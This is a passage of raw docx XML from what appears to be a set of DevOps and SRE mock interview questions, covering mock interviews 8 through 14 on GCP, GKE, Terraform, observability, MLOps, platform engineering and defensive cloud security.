        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Commitment planning: How would you decide whether to buy committed use discounts or reservations for GKE/Compute workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. OpenTelemetry: How would you roll out OpenTelemetry across services and connect traces, metrics, logs, dashboards, and alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud DNS: A production service intermittently resolves to an old endpoint. How would you debug DNS TTLs, Cloud DNS records, caches, split-horizon DNS, and client behavior?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. AlloyDB design: When would you choose AlloyDB over Cloud SQL, and what operational considerations would you discuss for HA, backups, scaling, and cost?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 8 - Platform Engineering and DevEx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. GitOps: How would you implement GitOps with ArgoCD for Kubernetes workloads across dev, staging, and production while keeping rollbacks and approvals safe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Policy as code: How would you use Sentinel, OPA, or policy validation to stop risky GCP changes before apply while keeping developer experience smooth?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. DNS migration: How would you migrate DNS zones with minimal risk, and how would you plan TTLs, validation, rollback, and monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Container runtime security: What runtime security controls would you consider for Kubernetes workloads beyond image scanning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Incident postmortem quality: What makes a postmortem high quality, and how do you ensure action items actually get completed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. ML monitoring tools: How would you combine Vertex AI Model Monitoring, Prometheus, Grafana, MLflow, and Evidently-style checks in one production monitoring design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Platform roadmap: What would your first 90 days look like as a senior platform engineer joining a product company?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Drift detection: How would you detect and reconcile drift between Terraform state, real GCP resources, and manual console changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 9 - MLOps and AI Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. MLOps fundamentals: Explain the end-to-end ML lifecycle and where DevOps responsibilities become different from traditional application delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. GKE multi-tenancy: How would you design namespace isolation, quotas, RBAC, network policies, admission controls, and observability for many teams in one cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Trace sampling: How would you choose tracing sampling rates and make traces useful for debugging high-volume services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. IAM troubleshooting: A workload gets permission denied only in production. How would you debug IAM policy, service accounts, Workload Identity, org policy, and audit logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Platform API: If you expose self-service infrastructure through an API, what validations, approvals, and audit trails would you build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Log correlation: How would you design correlation IDs and structured logging across microservices and async Pub/Sub workflows?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Model monitoring: How would you monitor model serving for latency, error rate, drift, data quality, and business impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Kubernetes certificate issue: A cluster has certificate or webhook TLS failures. How would you debug certificate chain, rotation, admission webhooks, and API server errors?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 10 - Senior Behavioral and Ownership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Backstage plugin: What Backstage plugins or templates would you prioritize for a GCP platform team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioral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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. BigQuery cost and performance: A BigQuery workload became slow and expensive. How would you investigate query patterns, partitioning, clustering, slots, storage, and ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. SRE toil: Give examples of toil in DevOps/SRE work and explain how you would measure and reduce it with automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Jenkins modernization: A company has old Jenkins pipelines. How would you modernize without disrupting releases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Dashboard design: What dashboards would you build for executives, SREs, platform engineers, and application teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Prioritization: You have security backlog, cost pressure, and reliability incidents. How would you prioritize work for the next quarter?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioral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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Runbooks: How would you build a runbook library for common GKE, Terraform, IAM, and networking incidents, and how would you keep it updated?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 11 - Google-Style Mixed Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. PDB design: How would you use PodDisruptionBudgets during node upgrades, cluster autoscaling, and planned maintenance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Stateful Kubernetes workloads: When would you avoid running stateful workloads on GKE, and if you must run them, how would you design storage, backup, upgrades, and recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. On-call maturity: How would you improve an on-call rotation that has too many alerts, poor runbooks, and slow escalation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. GPU cost control: GPU workloads are underutilized and expensive. How would you improve scheduling, quotas, sharing, and monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. RBAC: How would you design Kubernetes RBAC for platform, application, security, and CI/CD teams in a shared GKE environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Inference optimization: How would you improve model latency and throughput using batching, autoscaling, model format optimization, GPU use, or caching?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI Infra</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Blue-green deployment: When would you choose blue-green over canary, and what GCP/GKE components would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. SDK automation: Compare using Terraform, gcloud, REST APIs, and Python SDKs for platform automation. When would you choose each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 12 - Product Company Final Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Terraform provider upgrades: How would you safely upgrade Terraform and Google provider versions across many workspaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. CoreDNS incident: Services in a cluster intermittently fail DNS resolution. How would you debug CoreDNS, kube-dns metrics, network policies, and upstream DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Bash vs Python: When is Bash acceptable for automation, and when should you rewrite it in Python or Go?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Responsible AI: What checks would you add for bias, explainability, lineage, and responsible AI before approving a model for production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioral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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud SQL performance: A Cloud SQL database has high CPU and lock contention. How would you debug queries, connections, pooling, indexes, replicas, and app rollout impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Platform engineering: What self-service golden paths would you build for product teams, and what guardrails would you enforce without slowing delivery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 13 - Recently Asked GCP Access and Security Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Compute Engine SSH troubleshooting: You are not able to SSH into a Compute Engine instance. What could be the reasons, and how would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Compute Engine SSH access: What do we get when we SSH into a Compute Engine instance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. GKE Workload Identity: You have workloads running on GKE. How would you give only one pod access to Cloud Storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Service account key security: You know about service account JSON keys. Even if someone has the JSON key, how can you prevent them from creating or accessing resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. GKE image verification: In GKE, anyone can deploy a Docker image. How would you ensure that only verified and signed images are deployed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Hybrid connectivity: How do you connect an on-premises network to a GCP network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. GCP security baseline: What additional security measures would you implement for the GCP environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Cloud Logging analysis: You have logs in Cloud Logging. How would you analyze them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 14 - Recently Asked Operations and Docker Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Log automation: Can you automate log analysis or processing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Cloud Functions and Cloud Run: Have you used Cloud Functions or Cloud Run? Explain use cases and operational considerations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
